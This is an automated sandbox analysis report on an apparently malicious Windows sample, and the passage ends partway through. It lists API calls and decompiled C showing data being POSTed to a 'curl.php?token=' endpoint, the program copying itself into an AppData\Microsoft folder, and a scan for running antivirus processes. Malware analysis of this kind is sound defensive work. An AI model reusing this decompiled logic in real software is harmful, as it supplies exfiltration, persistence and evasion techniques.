                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0FC62EC8
                                        • UpdateWindow.USER32(00000000), ref: 0FC62ECF
                                        • CreateThread.KERNEL32 ref: 0FC62EE3
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FC62EEE
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FC62F05
                                        • TranslateMessage.USER32(?), ref: 0FC62F1C
                                        • DispatchMessageW.USER32 ref: 0FC62F23
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FC62F37
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                        • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                        • API String ID: 3011903443-520298170
                                        • Opcode ID: b6e0afab878248b59fab59001a4689a0647b2affe35ee171694956641241e16e
                                        • Instruction ID: 5f4fb9972d9380da0177069976e791621e14974c846b4b38f5e0b9738920ad79
                                        • Opcode Fuzzy Hash: b6e0afab878248b59fab59001a4689a0647b2affe35ee171694956641241e16e
                                        • Instruction Fuzzy Hash: 4F51507054C302EFE7109F618C4AB9B7BE4AF44B59F10451CF784AA181E7B8A549CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC654A0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136stringmemorynetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 35%
                                        			E0FC654A0(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				short _v136;
				char _v1156;
				short _v1160;
				void* _t31;
				int _t45;
				void* _t53;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t60;
				void* _t61;
				void* _t70;
				short _t71;

				_t59 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0FC67CE0( &_v36); // executed
				_t31 = E0FC65060(); // executed
				_v24 = _t31;
				_t70 = 0x400 + lstrlenA(_t59) * 2;
				_t7 = _t70 + 1; // 0x74cb6981
				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v28 = _t60;
				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t60 == 0) {
					L2:
					_t60 = 0;
					L3:
					lstrcatA(_t60, "data=");
					lstrcatA(_t60, _v12);
					asm("movdqu xmm0, [0xfc6fb20]");
					asm("movdqu [ebp-0x84], xmm0");
					asm("movdqu xmm0, [0xfc6fb30]");
					asm("movdqu [ebp-0x74], xmm0");
					asm("movdqu xmm0, [0xfc6fb40]");
					asm("movdqu [ebp-0x64], xmm0");
					asm("movdqu xmm0, [0xfc6fb50]");
					asm("movdqu [ebp-0x54], xmm0");
					asm("movdqu xmm0, [0xfc6fb60]");
					asm("movdqu [ebp-0x44], xmm0");
					asm("movdqu xmm0, [0xfc6fb70]");
					asm("movdqu [ebp-0x34], xmm0");
					lstrlenA(_t60);
					_t71 = 0;
					_v1160 = 0;
					E0FC69010( &_v1156, 0, 0x3fc);
					lstrcpyW( &_v1160, L"curl.php?token=");
					E0FC653A0( &_v1160);
					_t45 = lstrlenW( &_v136);
					_t74 = _v16;
					_push(_t45);
					_push( &_v136);
					_push(L"POST");
					_push(0x31fff);
					_push(_v16);
					_push(lstrlenA(_t60));
					_push(_t60);
					_t61 = _v24;
					_push( &_v1160);
					_push(_t61);
					if(E0FC67EF0( &_v36) != 0) {
						_t71 = 1;
						if(_a4 != 0) {
							_v12 = 0;
							if(E0FC65210(_t74,  &_v12) == 0) {
								_t71 = 0;
							} else {
								_t57 = _v12;
								if(_t57 != 0) {
									 *_v20 = _t57;
								}
							}
						}
					}
					VirtualFree(_t61, 0, 0x8000);
					VirtualFree(_v16, 0, 0x8000);
					VirtualFree(_v28, 0, 0x8000);
					_t53 = _v32;
					if(_t53 != 0) {
						InternetCloseHandle(_t53);
					}
					return _t71;
				}
				_t10 = _t70 + 1; // 0x74cb6981
				if(_t70 < _t10) {
					goto L3;
				}
				goto L2;
			}






















                                        0x0fc654ab
                                        0x0fc654ad
                                        0x0fc654b4
                                        0x0fc654b7
                                        0x0fc654bc
                                        0x0fc654c2
                                        0x0fc654d8
                                        0x0fc654df
                                        0x0fc654f3
                                        0x0fc654f7
                                        0x0fc654fc
                                        0x0fc65501
                                        0x0fc6550a
                                        0x0fc6550a
                                        0x0fc6550c
                                        0x0fc65518
                                        0x0fc6551e
                                        0x0fc65520
                                        0x0fc65529
                                        0x0fc65531
                                        0x0fc65539
                                        0x0fc6553e
                                        0x0fc65546
                                        0x0fc6554b
                                        0x0fc65553
                                        0x0fc65558
                                        0x0fc65560
                                        0x0fc65565
                                        0x0fc6556d
                                        0x0fc65572
                                        0x0fc65578
                                        0x0fc65587
                                        0x0fc6558d
                                        0x0fc655a1
                                        0x0fc655ad
                                        0x0fc655b9
                                        0x0fc655bf
                                        0x0fc655c2
                                        0x0fc655c9
                                        0x0fc655ca
                                        0x0fc655d2
                                        0x0fc655d7
                                        0x0fc655df
                                        0x0fc655e0
                                        0x0fc655e1
                                        0x0fc655ea
                                        0x0fc655eb
                                        0x0fc655f6
                                        0x0fc655fc
                                        0x0fc65601
                                        0x0fc65606
                                        0x0fc65616
                                        0x0fc65626
                                        0x0fc65618
                                        0x0fc65618
                                        0x0fc6561d
                                        0x0fc65622
                                        0x0fc65622
                                        0x0fc6561d
                                        0x0fc65616
                                        0x0fc65601
                                        0x0fc65636
                                        0x0fc65642
                                        0x0fc6564e
                                        0x0fc65650
                                        0x0fc65655
                                        0x0fc65658
                                        0x0fc65658
                                        0x0fc65666
                                        0x0fc65666
                                        0x0fc65503
                                        0x0fc65508
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0FC67CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FC67EC4
                                          • Part of subcall function 0FC67CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FC67EDD
                                          • Part of subcall function 0FC65060: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0FC650C6
                                          • Part of subcall function 0FC65060: Sleep.KERNEL32(000003E8), ref: 0FC65103
                                          • Part of subcall function 0FC65060: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FC65111
                                          • Part of subcall function 0FC65060: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FC65121
                                          • Part of subcall function 0FC65060: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FC6513D
                                          • Part of subcall function 0FC65060: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6514E
                                          • Part of subcall function 0FC65060: wsprintfW.USER32 ref: 0FC65166
                                          • Part of subcall function 0FC65060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC65177
                                        • lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 0FC654C5
                                        • VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 0FC654E5
                                        • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FC654FA
                                        • lstrcatA.KERNEL32(00000000,data=), ref: 0FC65518
                                        • lstrcatA.KERNEL32(00000000,0FC6582E), ref: 0FC6551E
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65572
                                        • _memset.LIBCMT ref: 0FC6558D
                                        • lstrcpyW.KERNEL32 ref: 0FC655A1
                                        • lstrlenW.KERNEL32(?), ref: 0FC655B9
                                        • lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 0FC655D9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 0FC65636
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0FC65642
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0FC6564E
                                        • InternetCloseHandle.WININET(?), ref: 0FC65658
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
                                        • String ID: POST$curl.php?token=$data=
                                        • API String ID: 186108914-1715678351
                                        • Opcode ID: beb6ab04e4720079116f05463c6282b85d4c826f0f0a7b627ec33a129cbcc88f
                                        • Instruction ID: 7aefde4242032ebc8570e04734d527f0f28b3c76c14d566c88e40ed2c6d65c83
                                        • Opcode Fuzzy Hash: beb6ab04e4720079116f05463c6282b85d4c826f0f0a7b627ec33a129cbcc88f
                                        • Instruction Fuzzy Hash: BD51B671D0830AAADB109BA5DC82FEEBB7CFF88710F105555EB44B2241EF78A644CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC62AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114stringmemorythreadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 331 fc62ad0-fc62b00 VirtualAlloc 332 fc62b02-fc62b1a 331->332 333 fc62b1c-fc62b1e 331->333 334 fc62b20-fc62b4a GetModuleFileNameW GetTempPathW call fc68090 332->334 333->334 337 fc62b53-fc62bae lstrlenW call fc68150 GetEnvironmentVariableW call fc68090 334->337 338 fc62b4c-fc62b4e 334->338 346 fc62bb0-fc62bc4 337->346 347 fc62bd8-fc62bfd lstrcatW * 3 call fc62890 337->347 339 fc62c40 call fc62960 338->339 343 fc62c45-fc62c47 ExitThread 339->343 351 fc62bc6-fc62bd1 346->351 352 fc62bd3 346->352 350 fc62c02-fc62c07 347->350 350->343 353 fc62c09-fc62c1d 350->353 351->352 354 fc62bd5-fc62bd6 351->354 352->354 357 fc62c1f-fc62c2a 353->357 358 fc62c2c 353->358 355 fc62c2f-fc62c3d wsprintfW 354->355 355->339 357->358 359 fc62c2e 357->359 358->359 359->355
                                        C-Code - Quality: 93%
                                        			E0FC62AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0FC68090(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0FC68150( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0FC68090(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0FC62890(_v28, _t50); // executed
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0FC62960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}




























                                        0x0fc62ad6
                                        0x0fc62aea
                                        0x0fc62af0
                                        0x0fc62af4
                                        0x0fc62af6
                                        0x0fc62b00
                                        0x0fc62b1c
                                        0x0fc62b1e
                                        0x0fc62b1e
                                        0x0fc62b02
                                        0x0fc62b02
                                        0x0fc62b02
                                        0x0fc62b08
                                        0x0fc62b10
                                        0x0fc62b12
                                        0x0fc62b14
                                        0x0fc62b14
                                        0x0fc62b28
                                        0x0fc62b2c
                                        0x0fc62b38
                                        0x0fc62b3e
                                        0x0fc62b43
                                        0x0fc62b48
                                        0x0fc62b4a
                                        0x0fc62b55
                                        0x0fc62b62
                                        0x0fc62b67
                                        0x0fc62b6c
                                        0x0fc62b75
                                        0x0fc62b89
                                        0x0fc62b8e
                                        0x0fc62b9c
                                        0x0fc62ba2
                                        0x0fc62ba5
                                        0x0fc62ba7
                                        0x0fc62bac
                                        0x0fc62bae
                                        0x0fc62be4
                                        0x0fc62bec
                                        0x0fc62bf4
                                        0x0fc62bf6
                                        0x0fc62bfd
                                        0x0fc62c02
                                        0x0fc62c05
                                        0x0fc62c07
                                        0x00000000
                                        0x00000000
                                        0x0fc62c0f
                                        0x0fc62c11
                                        0x0fc62c16
                                        0x0fc62c1d
                                        0x0fc62c2c
                                        0x0fc62c2c
                                        0x0fc62c2c
                                        0x0fc62c2e
                                        0x0fc62c2e
                                        0x0fc62c2f
                                        0x0fc62c35
                                        0x0fc62c3b
                                        0x00000000
                                        0x0fc62c3d
                                        0x0fc62c25
                                        0x0fc62c2a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc62c2a
                                        0x0fc62bb6
                                        0x0fc62bb8
                                        0x0fc62bbd
                                        0x0fc62bc4
                                        0x0fc62bd3
                                        0x0fc62bd3
                                        0x0fc62bd3
                                        0x0fc62bd5
                                        0x0fc62bd5
                                        0x00000000
                                        0x0fc62bd5
                                        0x0fc62bcc
                                        0x0fc62bd1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc62b4c
                                        0x0fc62b4c
                                        0x0fc62c40
                                        0x0fc62c40
                                        0x0fc62c45
                                        0x0fc62c47
                                        0x0fc62c47

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FC62AEA
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FC62B2C
                                        • GetTempPathW.KERNEL32(00000100,00000000), ref: 0FC62B38
                                        • lstrlenW.KERNEL32(?,?,?,00000052), ref: 0FC62B7D
                                          • Part of subcall function 0FC68150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FC6816D
                                          • Part of subcall function 0FC68150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FC6819B
                                          • Part of subcall function 0FC68150: GetModuleHandleA.KERNEL32(?), ref: 0FC681EF
                                          • Part of subcall function 0FC68150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FC681FD
                                          • Part of subcall function 0FC68150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FC6820C
                                          • Part of subcall function 0FC68150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC68255
                                          • Part of subcall function 0FC68150: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC68263
                                        • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0FC62B9C
                                        • lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0FC62BE4
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0FC62BEC
                                        • lstrcatW.KERNEL32(00000000,.exe), ref: 0FC62BF4
                                        • wsprintfW.USER32 ref: 0FC62C35
                                        • ExitThread.KERNEL32 ref: 0FC62C47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                        • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                        • API String ID: 139215849-2398311915
                                        • Opcode ID: 9ba043500b92a56aee0f4f9cefbd933922ab91e78cbc24dabe1b7db6098bcf82
                                        • Instruction ID: 7d0177e6c6a9b2a6aa074c2e357f5fd39f73072abf407154c24f07de09e35eb1
                                        • Opcode Fuzzy Hash: 9ba043500b92a56aee0f4f9cefbd933922ab91e78cbc24dabe1b7db6098bcf82
                                        • Instruction Fuzzy Hash: 3341777120C311AFE704DF219C8BB9B77D9EFC4715F044428F656A62C2DA78D908CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC67A10 Relevance: 25.6, APIs: 17, Instructions: 150memorystringprocessCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 374 fc67a10-fc67aaa VirtualAlloc * 2 375 fc67ad2-fc67ada 374->375 376 fc67aac-fc67ac2 CreateToolhelp32Snapshot 374->376 377 fc67ac4-fc67acc VirtualFree 376->377 378 fc67add-fc67af7 Process32FirstW 376->378 377->375 379 fc67bcd-fc67beb VirtualFree FindCloseChangeNotification 378->379 380 fc67afd 378->380 381 fc67bf7-fc67bff 379->381 382 fc67bed-fc67bf5 VirtualFree 379->382 383 fc67b00-fc67b02 380->383 382->381 384 fc67ba7-fc67bab 383->384 385 fc67b08-fc67b0b 383->385 386 fc67bc5-fc67bcb 384->386 387 fc67bad-fc67bb3 384->387 388 fc67b10-fc67b1d lstrcmpiW 385->388 386->379 387->386 389 fc67bb5-fc67bc0 lstrlenW 387->389 390 fc67b1f-fc67b23 388->390 391 fc67b2a-fc67b38 388->391 389->386 390->388 394 fc67b25-fc67b28 390->394 392 fc67b4f-fc67b5e lstrcatW * 2 391->392 393 fc67b3a-fc67b4d lstrcpyW lstrcatW 391->393 395 fc67b60-fc67b84 lstrlenW 392->395 393->395 396 fc67b87-fc67b96 Process32NextW 394->396 395->396 396->384 397 fc67b98-fc67ba1 GetLastError 396->397 397->383 397->384
                                        C-Code - Quality: 80%
                                        			E0FC67A10(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}


































                                        0x0fc67a2d
                                        0x0fc67a2f
                                        0x0fc67a3d
                                        0x0fc67a3f
                                        0x0fc67a46
                                        0x0fc67a4d
                                        0x0fc67a54
                                        0x0fc67a5b
                                        0x0fc67a62
                                        0x0fc67a69
                                        0x0fc67a70
                                        0x0fc67a77
                                        0x0fc67a7e
                                        0x0fc67a85
                                        0x0fc67a8c
                                        0x0fc67a93
                                        0x0fc67a9a
                                        0x0fc67aa1
                                        0x0fc67aa3
                                        0x0fc67aa5
                                        0x0fc67aaa
                                        0x0fc67ad4
                                        0x0fc67ada
                                        0x0fc67aac
                                        0x0fc67ab0
                                        0x0fc67ab6
                                        0x0fc67abc
                                        0x0fc67ac2
                                        0x0fc67adf
                                        0x0fc67ae1
                                        0x0fc67ae3
                                        0x0fc67ae6
                                        0x0fc67ae9
                                        0x0fc67aec
                                        0x0fc67aef
                                        0x0fc67af7
                                        0x00000000
                                        0x0fc67b00
                                        0x0fc67b08
                                        0x0fc67b10
                                        0x0fc67b1f
                                        0x0fc67b23
                                        0x00000000
                                        0x0fc67b25
                                        0x0fc67b25
                                        0x0fc67b25
                                        0x0fc67b87
                                        0x0fc67b87
                                        0x0fc67b8e
                                        0x0fc67b96
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc67b96
                                        0x0fc67b2e
                                        0x0fc67b2f
                                        0x0fc67b31
                                        0x0fc67b38
                                        0x0fc67b55
                                        0x0fc67b5e
                                        0x0fc67b3a
                                        0x0fc67b3a
                                        0x0fc67b47
                                        0x0fc67b47
                                        0x0fc67b60
                                        0x0fc67b7e
                                        0x0fc67b81
                                        0x0fc67b84
                                        0x00000000
                                        0x0fc67b84
                                        0x0fc67ba7
                                        0x0fc67bab
                                        0x0fc67bad
                                        0x0fc67bb3
                                        0x0fc67bc0
                                        0x0fc67bc0
                                        0x0fc67bb3
                                        0x0fc67bcb
                                        0x0fc67bcb
                                        0x0fc67bdb
                                        0x0fc67be0
                                        0x0fc67be6
                                        0x0fc67beb
                                        0x0fc67bf5
                                        0x0fc67bf5
                                        0x0fc67bff
                                        0x0fc67ac4
                                        0x0fc67acc
                                        0x00000000
                                        0x0fc67acc
                                        0x0fc67ac2

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0FC67A2D
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FC67AA1
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FC67AB6
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC67ACC
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0FC67AEF
                                        • lstrcmpiW.KERNEL32(0FC7033C,-00000024), ref: 0FC67B15
                                        • Process32NextW.KERNEL32(?,?), ref: 0FC67B8E
                                        • GetLastError.KERNEL32 ref: 0FC67B98
                                        • lstrlenW.KERNEL32(00000000), ref: 0FC67BB6
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC67BDB
                                        • FindCloseChangeNotification.KERNEL32(?), ref: 0FC67BE0
                                        • VirtualFree.KERNELBASE(?,?,00008000), ref: 0FC67BF5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
                                        • String ID:
                                        • API String ID: 1411803383-0
                                        • Opcode ID: e1226fe70a1c76f5b1dcb9721b75c98cf4228f0e80e7cd6e9f4e13e52a3be4be
                                        • Instruction ID: 278fe21af3b9dc21a011bb7cb0df838629c1faef1da3c9ca435f1a1d0a6a1610
                                        • Opcode Fuzzy Hash: e1226fe70a1c76f5b1dcb9721b75c98cf4228f0e80e7cd6e9f4e13e52a3be4be
                                        • Instruction Fuzzy Hash: B35182B1944319EBCB108F9AD88AB9D7BB4FF88725F104059E605BB281CB746915CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC65060 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 91memorystringsleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 fc65060-fc650d3 VirtualAlloc 399 fc6517f-fc65185 398->399 400 fc650d9-fc650e0 398->400 401 fc650e2-fc650ed 400->401 402 fc650ef-fc650f7 401->402 403 fc650f9-fc650fc 401->403 402->403 404 fc650fe-fc65103 Sleep 403->404 405 fc65109-fc65145 lstrlenW VirtualAlloc call fc64e90 lstrcmpiA 403->405 404->405 408 fc65147-fc6515a VirtualFree 405->408 409 fc6515c-fc6517d wsprintfW VirtualFree 405->409 408->401 409->399
                                        C-Code - Quality: 86%
